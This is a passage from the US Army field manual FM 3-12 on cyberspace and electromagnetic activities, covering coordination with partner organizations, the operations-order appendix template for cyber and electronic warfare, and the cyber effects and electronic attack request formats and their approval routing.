the joint EW cell, integrating the element into the higher CEMA section , or converting to a joint organization 
model.  
A-3. The theater campaign plan guides the planning of CEMA. The Army contributes an integrated CEMA 
plan to support joint operations. (For more information on joint IO, see JP 3 -13. For more information on 
joint SMO, see JP 6 -01.) 
INTERAGENCY AND INTE RGOVERNMEN TAL CONSIDERATIONS  
A-4. Army commanders must consider the unique capabilities, structures, and priorities of interagency and 
intergovernmental partners in the execution of  CEMA. Successful execution of missions with partners 
requires a shared understanding and common objective for the operation.  
A-5. Interagency and intergovernmental partners often have command relationships, lines of authority, and 
planning processes that can vary greatly from the Army. This will generally require liaison elements to be in 
place before operations, as it will likely be too late and ineffective to establish these elements after -the-fact. 
Partners often manage tasks through committees, steering groups, and interagency working groups organized 
along functional lines. The commander is res ponsible for developing interagency and intergovernmental 
coordination requirements and will likely require a robust liaison element similar to that required for 
multinational operations.  
A-6. Interagency  and intergovernmenta l  partners sometimes have policies that differ or are more restrictive 
than the Army’s policies. These differences manifest in legal authorities, roles, responsibilities, procedures, 
and decision -making processes.  The commander must ensure that the interagency and intergovernmental 
planners clearly understand military capabilities, requirements, operational limitations, liaisons, and legal 
considerations. Staffs integrating these partners into operations must under stand the nature of these 
relationships and types of support that partners can provide. Commanders will likely need to achieve 
consensus in the absence of a formal command structure to accomplish mission objectives with these 
organizations.  
Appendix A  
A-2 FM 3-12 11 April 2017  MULTINATIONAL C ONSIDERATIONS  
A-7. Army units executing CEMA within multinational operations require a robust liaison effort. Effective 
liaison mitigates complications caused by differences in policy and facilitates system integration and 
information sharing.  
A-8. Differences in national standards and laws pertaining to sovereignty in cyberspace and the EMS may 
affect the willingness or the legality of a country’s participation in CEMA. Some partners may refuse to 
participate, while others will e nable or undertake their own operations separate from the Army commander’s 
mission.  
A-9. Connectivity is essential when multi -national forces function in mutual support during combat 
operations. Connectivity issues may be compounded by interoperability issues. Hardware and software 
incompatibilities and disparities in standards, information security, and information assurance policy may 
cause gaps in security or capability that require additional effort to fix. This will likely slow down the 
collection, dissemin ation, and sharing of information among partners. Commanders and staffs should 
anticipate connectivity incompatibilities and disparities before entering a multinational operation.  
A-10. Intelligence and information sharing with allies and multinational  partners is important during 
multinational operations. Special attention and awareness is important when sharing information due to 
specific and varying classification sharing policies. When synchronizing cyberspace and EW operations  with 
multinational partners, Ar my units must ensure adherence to  foreign disclosure  and cybersecurity procedures. 
Security restrictions may prevent full disclosure of some cyberspace and electromagnetic capabilities or 
planning, which may severely limit synchronization efforts. Effectiv e synchronization requires access to 
systems and information at the lowest appropriate security classification level. Commanders are responsible 
for establishing procedures for foreign disclosure of intelligence information. (See AR 380 -10 for more 
informa tion on foreign disclosure.)  
NONGOVERNMENTAL ORGA NIZATIONS CONSIDERAT IONS  
A-11. Commanders ensure adherence to cybersecurity  procedures when conducting cyberspace operations 
with nongovernmental organizations.  Planning with nongovernmental organizations may be necessary for 
foreign humanitarian assistance, peace operations, and civil military operations. Incorporation of these 
organizations into an operation requires the commander to balance the need of the non governmental 
organization for information with operation security. Many nongovernmental organizations may be hesitant 
to become associated with the military to prevent compromising their status as independent entities. Many 
seek to maintain this status to prevent losing their freedom of movement or to keep their members from being 
at risk in hostile environments. Strategic level planning for inclusion of nongovernmental organizations into 
civil affairs operations will likely need  to coordinate cyberspace operations . 
HOST NATION CONSIDER ATIONS  
A-12. Each nation has sovereignty over its EMS and cyberspace components within its geographic area. The 
use of a nation’s cyberspace and the EMS require coordination and negotiation through formal approvals and 
certifications. Host nation coordination with regard to  the use of the EMS is a function of SMO. Coordinating 
spectrum use is based largely on the potential for electromagnetic interference with local receivers. This 
coordination ensures initial spectrum availability and supportability for operations and estab lishes cyberspace 
availability, such as bandwidth allocation. Additionally, coordination seeks to develop an interoperable 
cyberspace defense capability. Considerations for coordination must be given to adjacent countries, 
particularly if forces stage, tra in, or operate within these countries. Likewise, compatibility of protective 
measures, such as countermeasures systems, is essential to avoid system fratricide that degrades protection 
for all.  
INSTALLATION CONSIDE RATIONS  
A-13.  Cyberspace and EW operations  systems are complex and constantly evolving. Warfighter readiness 
and the ability to fight upon arrival are crucial for a fully capable, ready force. Commanders and system 
Integration with Unified Action Partners  
11 April 2017  FM 3 -12 A-3 operators must be proficient at using the  cyberspac e and EW  tools, systems, and processes necessary to 
execute CEMA.  
A-14.  Executing CEMA in a garrison environment presents unique challenges for several reasons. First, 
staffs may not be co -located physically, and this requires them to use telephonic or virtual collaboration and 
coordination. Second, the limitations on cyberspace and  EW operations will be constrained due to laws, 
policies, and regulations. Third, specific  mission sets for different installations (testing, training, and 
maintenance) may require sp ecial considerations. Lastly, operational relationships with garrison 
organizations such as the Network Enterprise Center need to be firmly established.  
PRIVATE INDUSTRY CON SIDERATIONS  
A-15. Private industry plays a signif icant role in cyberspace and the EMS . The Army relies on its connectivity 
with its defense industrial base partners and the private industry for many of its non -warfighting day -to-day 
functions for support and sustainment. Examples include electronic datab ases and interfaces for medical 
services , accounting and finance services , personnel records, equipment maintenance, and logistics functions. 
Global transport and logistics require data exchange between military and private networks. The Army relies 
on shi pping companies, transportation grid providers, and suppliers as a part of the global transportation 
system.  
A-16. The security and reliability of private industry networks directly affects DOD operations. These 
networks are not administered by DOD personnel, bu t they are essential to effective Army operations. 
Responsibility for these networks falls on the network owners.  
A-17. Private industry has proven to be the primary catalyst for advancements in information technology. 
This has resulted in the DOD becoming incre asingly reliant on commercial off -the-shelf technology. Many 
of these products are developed by, manufactured by, or have components produced by foreign countries. 
These manufacturers, vendors, service providers, and developers can be influenced by adversa ries or 
unwittingly used by them to provide counterfeit products or products that have built -in vulnerabilities. The 
DD Form 1494 ( Application for E quipmen t Frequency Allocation ) process determines compatibility and 
interoperability of commercial off -the-shelf systems that use the EMS to support  national needs.  Risk 
assessments and procedures should be followed to ensure proper supply chain management and the 
acquisition of software and hardware does not adversely affect the security of the DODIN.  
A-18. The DODIN  reside s on commercial networks as undersea cables, fiber optic networks, 
telecommunication services, satellite and microwave antennas from local telephone companies, and leased 
channels from satellites. Many of these commercial networks are under foreign ownership, control, and 
influence. This makes the conduct of cyberspace and EW operations vulnerable to access denial, service 
interruption, communications intercept ion and monitoring, infiltration, and data compromise. Army 
commanders pursue risk mitigati on through adherence to operations security, cybersecurity policies , 
inspection of vendor supplied equipment, encryption, and promotion of user and commander education.  
 
This page intentionally left blank.   
 
11 April 2017  FM 3 -12 B-1 Appendix B  
Cyberspace in Operations Orders  
Appendix B highlights the location of cyberspace operations information in operations 
orders and Appendix 12 to Annex C. 
OPERATIONS ORDERS AN D CYBERSPACE ELECTROMA GNETIC 
ACT IVITIES  
B-1. Operations Order s, fragmentary order s, and warning orders include cyberspace operations information. 
The information is throughout the orders in different attachments found in Annex C and  Annex H. The 
sections in the base operations orders and fragmentary orders with cyberspace operations information are 
paragraph 3, c ; 3, g; and paragraph 5, c. Warning orders have cyberspace operations information in paragraph 
5, c. 
B-2. Annexes to the operations order also have cyberspace oper ations information. All annexes in paragraph 
5, Command and Signal, have a subsection to describe the communications plan among the issuing force and 
interagency organizations including  the primary and alternate means of communications. The subsection 
includes operations security requirements and indicates to refer to Annex H (Signal) as required. Tabs C, D, 
and E of Annex C contain operations information necessary for close coordination with cyberspace 
operations. The assistant chief of staff, plans (G-5) or the G -3 (S-3) writes Annex C and the G -6 (S-6) writes 
Annex H. The attachments to the base order s contain ing detailed information on cyberspace operations  
include — 
 ANNEX C –OPERATIONS (G -5 OR G -3 [S-3]). 
 Appendix 12 –Cyber space  Electromagnetic Activities (Electronic Warfare Officer).  
 Tab A –Offensive Cyberspace Operations.  
 Tab B –Defensive Cyberspace Operations  (RA & IDM) . 
 Tab C –Electronic Attack.  
 Tab D –Electronic Protection.  
 Tab E –Electronic Warfare Support.  
 ANNEX H –SIGNAL (G -6 [S-6]). 
 Appendix 1 –Defensive Cyberspace Operations.  
 Appendix 2 –DODIN Operations . 
 Appendix 3 –Voice, Video, and Data Network Diagrams.  
 Appendix 4 –Satellite Communications.  
 Appendix 5 –Foreign Data Exchanges.  
 Appendix 6 –Spectrum Management Operations.  
 Appendix 7–Information Services.  
Note . See FM 6 -0 for more information on operations orders, fragmentary orders, and warning 
orders.  
Appendix B  
B-2 FM 3-12 11 April 2017  APPENDIX 12 (CYBER SPACE  ELECTROMAGNETIC ACTI VITIES) 
TO ANNEX C (OPERATIO NS) TO OPERATIONS PL ANS AND 
ORDERS  
B-3. Commanders and staffs use  Appendix 12 to Annex C to operations plans and orders to describe the 
cyberspace and EW operations  support in a base plan or order. The EWO is the staff officer responsible for 
this appendix. This Appendix 12 is a guide, and it should not limit the inform ation contained in an actual 
Appendix 12 based on this recommended context. Appendix 12 should be specific to the operation plan and 
order being conducted, and the refore  content of actual Appendix 12 will vary greatly.  
B-4. This appendix describes CEMA and obje ctives. Complex cyberspace and EW support may require a 
schematic to show integration and synchronization requirements and task relationships. This includes a 
discussion of the overall cyberspace and EW concept of operations, required support, and specific  details in 
element subparagraphs and attachments. This appendix contains the information needed to synchronize 
timing relationships of each of the elements related to cyberspace and EW operations . This appendix also 
includes related constraints, if approp riate. Figures B -1 to B -5 describe the sections of Appendix 12 to Annex 
C of the operations order.  
Cyberspace in Operations Orders  
11 April 2017  FM 3 -12 B-3 [CLASSIFICATION]  
Place the classification at the top and bottom of every page of the OPLAN or OPORD. Place the 
classification marking at the front of each paragraph and subparagraph in parentheses. See AR 380 -5 for 
classification and release marking instructions.  
Copy ## of ## copies  
Issuing headquarters  
Place of issue  
Date -time group of signature  
Message reference number  
Include the full heading if attachment is distributed separately from the base order or higher -level 
attachment.  
APPENDIX 12 (CYBER SPACE  ELECTROMAGNETIC ACTIVITIES) TO ANNEX C 
(OPERATIONS) TO OPERATION PLAN/ORDER [number] [(code name)] —[issuing 
headquarte r] [(classification of title)]  
(U) References:  Add any specific references to cyber space  electromagnetic activities, if needed.  
1.  (U) Situation . Include information affecting cyberspace and electronic warfare (EW) operations  that 
paragraph 1 of Annex C (Operations) does not cover or that needs expansion.  
a. (U) Area of Interest . Include information affecting cyberspace and the electromagnetic spectrum 
(EMS ); cyberspace may expand the area of local interest to a worldwide interes t. 
b. (U) Area of Operations . Include information affecting cyberspace and the EMS ; cyberspace may 
expand the area of operations outside the physical maneuver space.  
c. (U) Enemy Forces . List known and templated  locations and cyberspace and EW unit activities 
for one echelon above and two echelons below the order. Identify the vulnerabilities of enemy information 
systems and cyberspace and EW systems. List enemy cyberspace and EW operations that will impact 
friendly operations. State probable enemy courses of act ion and employment of enemy cyberspace and 
EW assets. See Annex B (Intelligence) as required.  
d. (U) Friendly Forces . Outline the higher headquarters’ cyberspace electromagnetic activities 
(CEMA ) plan. List plan designation, location and outline of higher, adjacent, and other cyberspace and 
EW operations assets that support or impact the issuing headquarters or require coordination and 
additional support. Identify friendly cyberspace and EW operat ions assets and resources that affect the 
subordinate commander . Identify friendly forces cyberspace and EMS  vulnerabilities. Identify friendly 
foreign forces with which subordinate commanders may operate. Identify potential conflicts within the 
EMS , espec ially for joint or multinational operations. Deconflict and priorit ize spectrum distribution.  
e. (U) Interagency, Intergovernmental, and Nongovernmental Organizations . Identify and describe 
other organizations in the area of operations that may impact cybers pace and EW operations  or 
implementation of cyberspace and EW operations specific equipment and tactics. See Annex V 
(Interagency) as required.  
 [page number]  
[CLASSIFICATION]  
Figure B-1. Appendix 12 -cyber space  electromagnetic activities  
Appendix B  
B-4 FM 3-12 11 April 2017  [CLASSIFICATION]  
f. (U) Third Party . Identify and describe other organizations, both local and external to the area of 
operations that have the ability to influence cyberspace and EW operations  or the implementation of 
cyberspace and EW operations  specific equipment and tacti cs. This category includes criminal and non -
state sponsored rogue elements.  
g. (U) Civil Considerations . Describe the aspects of the civil situation that impact cyberspace and 
EW operations . See Tab C (Civil Considerations) to Appendix 1 (Intelligence Estimat e) to Annex B 
(Intelligence) and Annex K (Civil Affairs Operations) as required.  
h. (U) Attachments and Detachments . List units attached or detached only as necessary to clarify 
task organization. List any cyberspace and EW operations  assets attached or detac hed, and resources 
available from higher headquarters. See Annex A (Task Organization) as required.  
i. (U) Assumptions . List any CEMA specific assumptions.  
2. (U) Mission . State the commander’s mission and describe cyberspace and EW operations  to support  
the base plan or order.  
3.  (U) Execution . 
a. Scheme of Cyber space  Electromagnetic Activities . Describe how cyberspace and EW operations  
support the commander’s intent and concept of operations. Establish the priorities of support to units for 
each phase of the operation. State how cyberspace and EW effects will degrade, disrupt, deny, and deceive 
the enemy. State the defensive and offensi ve cyberspace and EW measures. Identify target sets and effects, 
by priority. Describe the general concept for the integration of cyberspace and EW operations.  List the 
staff sections, elements, and working groups responsible for aspects of CEMA. Include t he cyberspace and 
EW collection methods for information developed in staff section, elements, and working groups outside 
the CEMA section and working group. Describe the plan for the integration of unified action and 
nongovernmental partners and organizations. See Annex C (Operations) as required. This section is 
designed to provide insight and understanding of the components of cyberspace a nd EW and how these 
activities are integrated across the operational plan. It is recommended that this appendix include an 
understanding of technical requirements.  
This appendix concentrates on the integration requirements for cyberspace and EW operations  and 
references appropriate annexes and appendi xes as needed to reduce duplication . 
(1) (U) Organization for Combat . Provide direction for the proper organization for combat, 
including  the unit designation, nomenclature, and tactical task.  
(2) (U) Miscellan eous. Provide any other information necessary for planning not already 
mentioned.  
b.  (U) Scheme of Cyberspace Operations . Describe how cyberspace operations support the 
commander’s intent and concept of operations. Describe the general concept for the imp lementation of 
planned cyberspace operations measures. Describe the process to integrate unified action partners and 
nongovernmental organizations into operations, including cyberspace requirements and constraints . 
Identify risks associated with cyberspace operations. Include collateral damage, discovery, attribution, 
fratricide (to U .S. or allied or multinational  networks or information), and possible conflicts. Describe 
actions that will prevent  enemy and adversar y action(s) to critically degrade the unified command’s ability 
to effectively conduct military operations in its area of operations. Identify countermeasures and the 
responsible agency. List the warnings, and how they will be monitored. State how the cybe rspace 
operations tasks will destroy, degrade, disrupt, and deny enemy computer networks.  Identify and prioritize 
target sets and effect(s) in cyberspace. If appropriate, state how cyberspace operations support the 
accomplishment of the operation. Identify  plans to detect or assign attribution of  enemy and adversary 
actions in the physical domains and cyberspace. Ensure subordinate units are conducting   
[page number]  
[CLASSIFICATION]  
Figure B-1. Appendix 12 -cyber space  electromagnetic activities  (continued)  
Cyberspace in Operations Orders  
11 April 2017  FM 3 -12 B-5 [CLASSIFICATION]  
defensive cyberspace operations  (DCO ). Synchronize the CEMA section with the IO officer. Pass requests 
for offensive cyberspace operations  (OCO ) to higher headquarters for approval and implementation. 
Describe how DOD information network operations support the commander’s intent and concept of 
operations. Synchronize DODIN operations with the G-6 (S-6). Prioritize the allocation of applications 
utilizing cyberspace. Ensure the employment of cyber space  capabilities where the primary purpose is to 
achieve objectives in or through cyberspace. Considerations should be made for degraded network 
operations. (Reference appropriate annexes and appendi xes as needed to reduce duplication).  
(1) (U)  DODIN Operations . Describe how information operations are coordinated, synchronized, 
and support operations integrated with the G -6 (S-6) to design, build, configure, secure, operate, maintain, 
and sustain networks.  See Annex H (Signal) as required .  
(2) (U)  Defensive Cyberspace Operations . Describe how DCO are conducted, coordinated, 
integrated, synchronized, and support operations to defend the DODIN -A and preserve the ability to utilize 
friendly cyberspace capabilities.  
(3) (U)  Offensive Cyberspace Operations . Describe how OCO are coordinated, integrated, 
synchronized, and support operations to achieve real time awareness and direct dynamic actions and 
response actions. Include target identification and oper ational pattern information, exploit and attack 
functions, and maintain intelligence information. Describe the authorities required to conduct OCO.  
c. (U) Scheme of Electronic Warfare . Describe how EW supports the commander’s intent and 
concept of operations. Establish the priorities of support to units for each phase of the operation. State 
how the EW tasks will degrade, disrupt, deny, and deceive the enemy. Describe the process to integrate 
and coordi nate unified action partner EW capabilities which support the commander’s intent and concept 
of operations. State the electronic attack, electronic protection, and electronic warfare support measures 
and plan for integration. Identify target sets and effec ts, by priority, for EW operations.  
Synchronize with IO officer . See the following attachments as required: Tab C,  D, E (Electronic Warfare) 
to Appendix 12 (Cyber space  Electromagnetic Activities); Appendix 15  (Information Operations of Annex 
C). 
(1) (U) Electronic Attack . Describe how offensive EW activities are coordinated, integrated, 
synchronized, and support operations. See Tab C (Electronic Attack) to Appendix 12 (Cyber space  
Electromagnetic Activities) . 
(2) (U) Electronic Protection . Describe how def ensive EW activities are coordinated, 
synchronized, and support operations. See Tab D (Electronic Protection) to Appendix 12 (Cyber space  
Electromagnetic Activities) . 
(3) (U) Electronic Warfare Support . Describe how EW support activities are coordinated, 
synchronized, and support operations. See Tab E (Electronic Warfare Support) to Appendix 12 
(Cyber space  Electromagnetic Activities) . 
d. (U) Scheme of Spectrum Management Operations . Describe how spectrum management 
operations  (SMO)  support the commander’s intent and concept of operations. Outline the effects the 
commander wants to achieve while prioritizing SMO tasks. List the objectives and primary tasks to achieve 
those objectives. State the spectrum management, frequency assignme nt, host nation coordination, and 
policy implementation plan. Describe the plan for the integration of unified action partners’ SMO  
capabilities. See Annex H (Signal) as required.  
e. (U) Tasks to Subordinate Units . List cyberspace and EW operations tasks assi gned to each 
subordinate unit not contained in the base order.  
 
[page number]  
[CLASSIFICATION]  
Figure B-1. Appendix 12 -cyber space  electromagnetic activities (continued)  
Appendix B  
B-6 FM 3-12 11 April 2017  [CLASSIFICATION]  
f. (U) Coordinating Instructions . List cyberspace and EW operations instructions applicable to two 
or more subordinate units not covered in the base order. Identify and highlight any cyberspace and EW 
operations specific rules of engagement, risk reduction control measures, environmental considerations, 
coordination requir ements between units, and commander’s critical information requirements and critical 
information that pertain to CEMA.  
4.  (U) Sustainment . Identify priorities of sustainment for cyberspace and EW operations key tasks and 
specify additional instructions as re quired. See Annex F (Sustainment) as required.  
a. (U) Logistics . Use subparagraphs to identify priorities and specific instruction for logistics 
pertaining to cyberspace and EW operations. See Appendix 1 (Logistics) to Annex F (Sustainment) and 
Annex P (Host Nation Support) as required . 
b. (U) Personnel . Use subparagraphs to identify priorities and specific instruction for human 
resources support pertaining to cyberspace and EW operations. See Appendix 2 (Personnel Services 
Support) to Annex F (Sustainment) as required.  
c. (U) Health System Support . See Appendix 3 (Army Health System Support) to Annex F 
(Sustainment) as required.  
5. (U) Command and Signal . 
a. (U) Command . 
(1) (U)  Location of Commander.  State the location of key cyberspace and EW operations leaders.  
(2) (U) Liaison Requirements . State the cyberspace and EW operations liaison requirements not 
covered in the unit's SOPs.  
b. (U) Control .  
(1) (U)  Command Posts . Describe the employment of cyberspace and EW operations specific 
command posts (CPs), including the l ocation of each CP and its time of opening and closing.  
(2) (U)  Reports . List cyberspace and EW operations specific reports not covered in SOPs. See 
Annex R (Reports) as required.  
c. (U) Signal . Address any cyberspace and EW operations specific communications  requirements. 
See Annex H (Signal) as required.  
ACKNOWLEDGE:  Include only if attachment is distributed separately from the base order.  
     [Commander's last name]  
     [Commander's rank]  
The commander or authorized representative signs the original copy of the attachment. If the 
representative signs the original, add the phrase "For the Commander." The signed copy is the historical 
copy and remains in the headquarters' files.  
OFFICIAL:  
[Authenticator's name]  
[Authenticator's position]  
[page number]  
[CLASS IFICATION]  
Figure B-1. Appendix 12 -cyber space  electromagnetic activities (continued)  
Cyberspace in Operations Orders  
11 April 2017  FM 3 -12 B-7 [CLASSIFICATION]  
Use only if the commander does not sign the original attachment. If the commander signs the original, no 
further authentication is required. If the commander does not sign, the signature of the preparing staff 
officer requires authentication and only the last name and rank of the commander appear in the signature 
block.  
ATTACHMENTS:  List lower level attachment (tabs and exhibits). If a particular attachment is not used, 
place "not used" beside the attachment number. Unit standard operating procedures will dictate 
attachment development and format. Common attachments include the follo wing:  
APPENDIX 12 (CYBER SPACE  ELECTROMAGNETIC ACTIVITIES) TO ANNEX C 
(OPERATIONS) TO OPERATION PLAN/ORDER [number] [(code name)] -[issuing headquarter] 
[(classification of title)]  
ATTACHMENT :  List lower -level attachment (tabs and exhibits)  
Tab A - Offensi ve Cyberspace Operations  
Tab B - Defensive Cyberspace Operations - Response Actions  
Tab C - Electronic Attack  
Tab D - Electronic Protection  
Tab E - Electronic Warfare Support  
DISTRIBUTION:  Show only if distributed separately from the base order or higher -level attachments.  
 
 [page number]  
[CLASSIFICATION]  
Figure B-1. Appendix 12 -cyber space  electromagnetic activities (continued)  
 
 
This page intentionally left blank.   
 
11 April 2017  FM 3 -12 C-1 Appendix C  
Cyber Effects Request Format  
Appendix C includes the procedures for approving cyberspace effects at echelons corps 
and below, echelons above corps, and the cyber effects request format fields and 
information.  
REQUESTING CYBER SPACE  EFFECTS  
C-1. The CERF is the format forces use to request effects in and through cyberspace. Effects in cyberspace 
can support operations in any domain. Executi on orders provide authoriz ation  to execute cyberspace effects. 
Support in response to CERFs may be from joint cyberspace forc es such as the combat mission teams, from 
other joint or service capabilities, or from servi ce retained cyberspace forces.  
EFFECTS APPROVAL AT ECHELONS CORPS AND BELOW  
C-2. During the operations process at echelons corps and below, the commander and staff ident ify the 
effects desired in and through cyberspace to support operations against specific targets. If the requesting and 
higher echelons determine that a current capability is insufficient, the commander and staff approves and 
processes the CERF. This happe ns at each echelon until the CERF reaches a joint headquarters and the 
approval process varies slightly depending on the hierarchy. The CERF approval process at echelons corps 
and below follows the below steps — 
 Identify targets of cyberspace effects.  
 Verify if organic capabilities can create desired effects.  
 Approve target for cyberspace effects.  
 Forward  to next higher Army echelon for deconfliction and synchronization . 
 Verify if other organic capabilities can create desired effects , if organic cybersp ace capabilities do 
not exist . 
 If current capabilities fulfill requirement , synchronize operations.  
 If current capabilities do not fulfill requirement, approve target for cyberspace effects.  
 Forward  to next higher Army echelon for approval until CERF enter s joint process.  
 Synchronize operation with cyberspace effect (if possible).  
EFFECTS APPROVAL AT ECHELONS ABOVE CORPS  
C-3. Cyberspace operations provide a means by which Army forces can achieve periods or instances of 
cyberspace superio rity to create effects to support  the commander’s objectives. The employment of 
cyberspace capabilities tailored to create specific effects is planned, prepared, and executed using existing 
processes and procedures. However, there are additional processes and procedures that account for t he unique 
nature of cyberspace and the conduct of cyberspace operations to support  unified land operations. 
Commander and staffs at all echelons apply additional measures for determining where, when, and how to 
use cyberspace effects.  
C-4. Commanders and staffs  at each echelon will coordinate and collaborate regardless of whether the 
cyberspace operation is directed from higher headquarters or requested from subordinate units. The Army 
intelligence process informed by the joint intelligence process provides the necessary analysis and products 
from which target s are vetted and validated and aimpoints are derived.  As a result of the Army IPB informed 
by the joint intelligence preparation of the operational environment, network topologies are developed for 
enemy, ad versary, and host nation technical networks.  
Appendix C 
C-2 FM 3-12  11 April 2017 C-5. Targets determined during the planning process are described broadly as physical and logical entities 
in cyberspace consisting of one or more networked devices used by enemy and adversary actors. These targets 
may be established as named area of interests and targeted area of interests as appropriate. Additionally, an 
analysis of friendly force networks will inform the development of critical information and provide a basis 
for establishing key terrain in cyberspace. Key terrain in the defense are those physical and logical entities in 
friendly force technical networks of such extraordinary importance that any disruption in their operation 
would have debilitating effects upon accomplishment of the mission. 
C-6. As part of CEMA, the staff will perform a key role in target network node analysis. As effects are 
determined for target and critical network nodes, the staff will prepare, submit, and track the CERF. This 
request will elevate above the corps echelon and integrate into the joint targeting cycle for follow on 
processing and approval. The joint task force, combatant command, and USCYBERCOM staff play a key 
role in processing the CERF and coordinating follow on cyberspace capabilities. Figure C-1 depicts the 
standard routing of the CERF. 
Figure C- 1. Cyber effects request format routing for cyberspace operations 
C-7. Joint forces receive cyberspace effects requests from different organizations. Cyberspace effects 
requests from Army forces at echelons corps and below process through a joint headquarters. Requests from 
joint task force receive guidance from the expeditionary cyber support element. Request from a combatant 
commander receives support from the cyber support element. The CERF is input into the USCYBERCOM 
portal for processing. All cyberspace effects support approved operations. Joint Forces Headquarters-Cyber 
coordinates with USCYBERCOM for approv al and synchronization cyberspace effects missions and 
operations. USCYBERCOM sends approved cyberspace effect mission to the appropriate Joint Forces 
Headquarters-Cyber for execution. The Joint Forces Headquarters-Cyber synchronizes execution with the 
cyberspace or expeditionary cyberspace element as appropriate to support the echelon corps and below 
mission. The CERF at echelons above corps follows the below steps: 
The joint task force receives the CERF.

Cyber Effects Request Format  
11 April 2017  FM 3 -12 C-3  Coordinates with the expeditionary cyberspace support element.  
 Approves C ERF and send to combatant command.  
 Approves CERF.  
 Inputs CERF into USCYBERCOM portal.  
 USCYBERCOM approves CERF.  
 Cyberspace effects target added to joint integrated prioritized target list.  
 USCYBERCOM sends cyberspace effects mission to appropriate Joint Fo rces Headquarters -
Cyber . 
 Joint Forces Headquarters -Cyber synchronizes with cyberspace support element or expeditionary 
cyberspace element.  
 Expeditionary cyberspace support element or cyberspace support element synchronizes with joint 
headquarters.  
CYBER EF FECTS REQUEST FORMAT  PREPARATION  
C-8. Although t he requesting unit may not have the specific target network topology information it should 
provide current target information. The approval process for cyberspace effects may take longer than other 
targeting capabilities. Figure C -2 on page C -4 shows an example the format and instructions r equired to 
complete the CERF.  The requesting unit will complete all sections except the USCYBERCOM operations 
directorate of a joint staff (J-3) portion of the CERF as described below.  
Appendix C 
C-4 FM 3-12  11 April 2017 Figure C-2. Cyber effects request format 
CYBER EFFECTS REQUEST FORMAT SECTION 1 REQUESTING UNIT INFORMATION  
C-9. Section 1 of the CERF requests the following unit information — 
Supported Major Command. Enter the major command authorized to validate and prioritize the
CERF. For Army units at corps level and below this entry will commonly include the geographic
or functional combatant command.
Date. Enter the date the completed CERF(s) are submitted to higher headquarters.
Time Sent. Enter the time the CERF is submitted to higher headquarters.
Requesting Unit. Enter the name of the unit originating the requirement for the creation of effect(s)
or conduct of specific activities.

Cyber Effects Request Format  
11 April 2017  FM 3 -12 C-5  By. Enter the rank , last, and first name of the unit point of contact  that time stamped and processed 
the CERF.  
 Point of C ontact. Enter the rank, last, and f irst name of the unit point of contact from the requesting 
unit. Also, enter phone number and e -mail.  
 Classification. Enter the overall classification of the document. Ensure classification markings are 
applied to each section and supporting documentation.  
CYBER EFFECTS REQUEST FORMAT  SECTION 2 SUPPORTED OPERATION INFORMATION  
C-10. Section 2 of the CERF requests the following supported operation information — 
 Supported OPLAN/CONPLAN/Order. Describe key information within the plan that the 
requested effect(s) will support.  
 Supported Mission S tatement. Describe the unit’s essential task(s) and purpose that the requested 
effect(s) will support.  
 Supported Commander’s I ntent. Describe key information within the commander’s intent that the 
requested effect(s) will suppor t. 
 Supported Commander’s End S tate. Describe key information within the commander’s end state 
that the requested effect(s) will support.  
 Supported Concept of O peration s. Describe key information within the concept of operations that 
the requested effect(s)  will support.  
 Supported O bjective (strategic, operational, and tactical). Describe the supported objective(s) that 
the requested effect(s) will directly support.  
 Supported Tactical Objective/T ask. Describe the tactical objectives and tasks that the reques ted 
effect(s) will directly or indirectly support.   
C-11. The remaining portion of Section 2 is completed by the USCYBERCOM J3 . 
CYBER EFFECTS REQUEST FORMAT  SECTION 3 COMPUTER NETWORK OPERATIONS  
C-12. Section 3 of the CERF requests the following computer network oper ations and s pecific information — 
 Type of T arget.  
 Indicate “scheduled” if specific dates, times, and or supporting conditions are known.  
 Indicate  “on-call” if trigger events or supporting conditions are known.  
 Target P riority.  
 Indicate “emergency” if target  requires immediate action. Indicate “priority” if target requires 
a degree of urgency.  
 Indicate “routine” if target does not require immediate action or a degree of urgency beyond 
standard  processing.  
 Target N ame.  Enter name of target as codified in the M odernized Integrated Database.  
 Target L ocation.  
 Provide target location according to CJCSI 3370.01, Enclosure D . 
 Disregard  if the request is for specific activities to support  DODIN operations or DCO.  
 Target D escription.  
 Provide target(s) description according to CJCSI 3370.01, Enclosure D.  
 Provide description of network node(s) wherein specific activities are to support  DODIN 
operations  or DCO.  
 Desired E ffect.  
 Enter deny, degrade, disrupt, destroy, or manipulate for OCO.  
 Provide  timing as “less than 96 ho urs”, “96 hours to 90 days”, or “greater than 90 days”.  
 Target F unction.  Enter target(s) primary function  and a dditional functions if known.  
 Target S ignificance.  Describe why the target(s) is important to the  enemy’s or  adversary’s target 
system(s) and/or value in addition to its functions and expectations.  
Appendix C  
C-6 FM 3-12 11 April 2017   Target D etails.  Describe additional information about the target(s) if known. This information 
should include any relevant device information such as type; number of users; activity; friendly 
actors in t he area of operations;  and surrounding/adjacent/parallel devices.  
 Concept of Cyber space  Operations.  
 Describe how the requested effect(s) would contribute to the commander’s objectives and 
overall concept of operations.  
 Include task, purpose, method, and en d state.  
 Describe the intelligence collection plan and specific assessment plan if known.  
 Provide  reference to key directives and orders.  
 Target Expectation S tatement.  According to CJCSI 3370.01, Enclosure D, describe how the 
requested effect(s) will impact the target system(s).  This description must address the following 
questions.  
 How will the target system be affected if the target’s function is neutralized, delayed, 
disrupted, or degraded? ( Two examples are  operational impact  and psychological impa ct.) 
 What is the estimated degree of impact on the target system(s)?  
 What is the functional recuperation time estimate d for the target system(s) if the target’s 
function is neutralized, delayed, disrupted, or degraded?  
 What distinct short -term and/or long -term military or political advantage/disadvantage do we 
expect if the target’s function is neutralized, delayed, disrupted, or degraded?  
 What is the expected  enemy or  adversary reaction to affecting the target’s function?  
 
11 April 2017  FM 3 -12 D-1 Appendix D  
Electronic Attack Request Format  
Appendix D includes the electronic attack request format and the electro nic attack 5-
line briefing formats. These formats are used to request specific electronic attack 
support and on -call electronic attack support.  
ELECTRONIC ATTACK RE QUEST EXAMPLES  
D-1. Request EA effects via normal request processes and provide specific effects requests using the EARF. 
The EARF normally accompanies the joint tactical air strike request. For more information on this format 
see ATP 3 -09.32.  (See table D -1 for an example of the EARF. ) 
Table D-1. The electronic attack request format  
Format  24. Electronic  Attack  Request  Format  (EARF)  
Requesting  Major  Supported  Command:  
Requesting  Unit: 
Contact Information:  This person  will be responsible  to verify that the EARF  has been  approved  before  the mission  
starts and  to relay the  information  to the executing  unit. 
Joint Tactical Air Request (JTAR)  Number: Enter  the corresponding  JTAR  number  that will  be submitted  with this 
EARF.  
Concept  of Operations: Describe  the concept  of operations.  This will include  the objective, forces  used, timeline  of the  
